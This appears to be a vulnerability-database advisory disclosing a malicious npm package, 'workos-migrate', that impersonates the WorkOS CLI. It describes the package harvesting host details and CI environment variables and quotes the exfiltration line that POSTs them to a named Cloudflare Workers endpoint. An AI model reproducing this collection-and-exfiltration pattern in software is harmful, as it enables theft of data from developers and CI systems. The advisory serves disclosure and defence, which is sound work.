VDB
GCVE-110-OSM-2026-5109
GCVE-110-OSM-2026-5109
Advisory PublishedCVSS 8.8/10
Exfiltrates system identity and CI environment variables to an attacker-controlled Cloudflare Workers endpoint when invoked via `npx workos-migrate`. Collects hostname, username, working directory, home directory, platform, architecture, memory, network interfaces, and CI tokens including GITHUB_ACTIONS, GITHUB_REPOSITORY, GITHUB_ACTOR, VERCEL, GITLAB_CI, JENKINS_URL, and CIRCLECI, then POSTs the payload as JSON to https://callback-monitor.cyb3rsh4ykh.workers.dev/c. Impersonates the legitimate WorkOS migration CLI tool.
**Trigger**: bin entrypoint — exfiltration fires when the user runs `npx workos-migrate`; no install hook is present.
**Collection (system info)**: reads `os.hostname()`, `os.userInfo().username`, `process.cwd()`, `os.homedir()`, `os.platform()`, `os.arch()`, `process.version`, `os.cpus().length`, `os.totalmem()`, `os.uptime()`, and `os.networkInterfaces()`.
**Collection (CI env vars)**: reads `process.env.GITHUB_ACTIONS`, `process.env.GITHUB_REPOSITORY`, `process.env.GITHUB_ACTOR`, `process.env.VERCEL`, `process.env.VERCEL_ENV`, `process.env.GITLAB_CI`, `process.env.JENKINS_URL`, `process.env.CIRCLECI`, `process.env.CI`, `process.env.CONTINUOUS_INTEGRATION`.
**Encoding**: all collected data serialized as JSON.
**Exfiltration**: POSTs to literal constant `CALLBACK_URL = 'https://callback-monitor.cyb3rsh4ykh.workers.dev/c'` via `mod.request(CALLBACK_URL)` in `loaders/index.js`.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | workos-migrate | 1.0.0 (affected) | — |
Browse GCVE Records
73,053 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.